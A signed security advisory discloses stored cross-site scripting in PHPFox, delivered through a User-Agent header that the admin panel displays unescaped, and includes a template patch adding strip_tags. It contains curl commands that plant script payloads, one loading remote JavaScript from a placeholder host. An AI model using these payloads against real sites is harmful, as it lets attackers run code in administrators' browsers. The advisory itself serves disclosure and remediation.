Administrators of PHPFox can be hit by cross site scripting via malicious user agents planted in the logs.
166039ec499dbd3cdcc027d78b3c0737c34a6e0b31547ef2159dc41ac1da1b7c
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CNA primary
MITRE Corporation ( cve-assign [ \\**NOSPAM\\ ] mitre \\NOSPAM\\ org )
Software Vendors
http://moxi9.com/phpfox
Product: PhpFox
Version: ALL
Research
Wesley Henrique Leite ( wesleyhenrique [\\NOSPAM**] gmail \\NOSPAM// com )
[+] INFORMATION
Vendor Notified : 2014-10-22
Vendor Homepage : http://moxi9.com/phpfox
Response Vendor: fixed 2014-10-23 (to v4 Beta)
[+] DESCRIPTION
The system stores all urls accessed in a database table, below
information in the same 'phpfox_log_session'
[phpfox]> desc phpfox_log_session;
+---------------+----------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+---------------+----------------------+------+-----+---------+-------+
| session_hash | char(32) | NO | MUL | NULL | |
| id_hash | char(32) | NO | | NULL | |
| captcha_hash | char(32) | YES | MUL | NULL | |
| user_id | int(10) unsigned | NO | MUL | NULL | |
| last_activity | int(10) unsigned | NO | MUL | NULL | |
| location | varchar(255) | YES | | NULL | |
| is_forum | tinyint(1) | NO | | NULL | |
| forum_id | smallint(4) unsigned | NO | | NULL | |
| im_status | tinyint(1) | NO | | 0 | |
| im_hide | tinyint(1) | NO | | 0 | |
| ip_address | varchar(15) | NO | | NULL | |
| user_agent | varchar(100) | NO | | NULL | |
+---------------+----------------------+------+-----+---------+-------+
the column that can be manipulated is:
-> user_agent (100)
all acess store in the system, such as bots and users wandering around the
web site, can be seen in:
AdminCP
TOOLS > Online > Guests/Boots
Output
| IP ADDRESS | User-Agent | ...
knowing this, the following code was created to inject a script into the
AdminCP with User-Agent.
$ curl -A "<script src='http://www.example.com/script.js'></script>" \
http://www.meusite.com.br/
OR
$ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/
when any user with administrative access in.
'AdminCP'
TOOLS > Online > Guests/Boots
we have the script running in the administrative area.
[+] My Solution
(line 1.8)
1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 10:00:11 2014 -0200
1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 12:28:39 2014 -0200
1.3 @@ -25,7 +25,7 @@
1.4 {foreach from=$aGuests key=iKey item=aGuest}
1.5 <tr class="checkRow{if is_int($iKey/2)} tr{else}{/if}">
1.6 <td><a href="{url link='admincp.core.ip' search=$aGuest.ip_address_search}" title="{phrase var='admincp.view_all_the_activity_from_this_ip'}">{$aGuest.ip_address}</a></td>
1.7 - <td>{$aGuest.user_agent}</td>
1.8 + <td>{$aGuest.user_agent|strip_tags}</td>
1.9 <td class="t_center">
1.10 <div class="js_item_is_active"{if !$aGuest.ban_id} style="display:none;"{/if}>
1.11 <a href="#?call=ban.ip&ip={$aGuest.ip_address}&active=0" class="js_item_active_link" title="{phrase var='admincp.unban'}">{img theme='misc/bullet_green.png' alt=''}</a>
1.12 @@ -43,4 +43,4 @@
1.13 <div class="extra_info">
1.14 {phrase var='admincp.no_guests_online'}
1.15 </div>
1.16 -{/if}
1.17 \ No newline at end of file
1.18 +{/if}
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
iQIcBAEBAgAGBQJUZLi0AAoJEDGxib0S8PLVo48P/2rcvW9s777zPbcqAW2T8ymd
OQN2wOnZeCWqAJOIWxOQCXUuPjmuEkXuH/rxn8scBTKY3iluv1uy53w+DwP3gsDm
3r4uur1W28soZ6/uyEQvySfI202gY5nOS1e07ezIrIm7Q9Fc6ibYVtmJ/A04gWEA
DIz1otTEB47/4tHGcm651DOOoSmLLEWImpUzUZgBKXlU2OdsLMPDvempTBPsqGCl
ENWI86kUUIQ18xhHttAGY96fjYWEXW4bogg4O5G3E9TUEsEXf+qo2pUrPT+AJNMA
2HS+jzPhnmhhGsufQ9m7VxY8tsBM/ciiGQNeHrOGDiZtR2sSaXDW8eCgs1W+Hwbb
CKtqG2CTgL7YADI1I7qo6b24GDz2NqeICaFoOvt2WsqD51WVtTfLctMAIKsM9jGF
Jtflp44QMbH+DS0QklvL1N6vifgosFkzUejDRZGmQ/gOntlrBLfOsmJMEvuE38ip
G4eocs5Cl4dIVwEioLjw2RT9xGxAhkCsBZaD+UTGA+VfRo5KvNnHCYtarmL8RJAK
tWQtVuO/wAY5rk38hBooqWXrSYWgor1cFr69YZngp8ersnW4BS4dSiZju3vT91+a
LEA+nugK6GUdCsD3JNRjuVSI7KKtjWL9DQD4WxN1EhSQ9EzPHXx8PciVUe/QplBU
k6e1xQ6TG1PM8XwOHJGJ
=twLD
-----END PGP SIGNATURE-----